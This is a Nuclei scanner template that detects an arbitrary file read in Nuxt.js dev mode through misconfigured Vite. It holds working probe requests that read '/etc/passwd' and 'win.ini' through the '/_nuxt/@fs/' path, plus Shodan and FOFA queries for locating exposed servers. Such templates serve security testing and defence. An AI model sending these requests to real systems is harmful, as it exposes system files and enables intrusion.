id: nuxt-js-lfi

info:
  name: Arbitrary File Read in Dev Mode - Nuxt.js
  author: DhiyaneshDK
  severity: high
  description: |
    Vite is misconfigured within nuxt to permit any file to be retrieved from the file system.
  reference:
    - https://huntr.dev/bounties/4849af83-450c-435e-bc0b-71705f5be440/
    - https://bryces.io/blog/nuxt3
    - https://twitter.com/fofabot/status/1669339995780558849
  metadata:
    verified: "true"
    max-request: 2
    shodan-query: html:"buildAssetsDir" "nuxt"
    fofa-query: body="buildAssetsDir" && body="__nuxt"
  tags: huntr,lfi,nuxtjs

http:
  - method: GET
    path:
      - "{{BaseURL}}/_nuxt/@fs/etc/passwd"
      - "{{BaseURL}}/_nuxt/@fs/windows/win.ini"

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

# digest: 490a00463044022056d9671ee758871957fb2d26640d18efdef5bef4dd8d1ebcef02821d927d5ad0022012b8f94b4b5c3128407c8cd5d3aeafda39943da77d0311bc0417e686a024ff54:922c64590222798bb761d5b6d8e72950
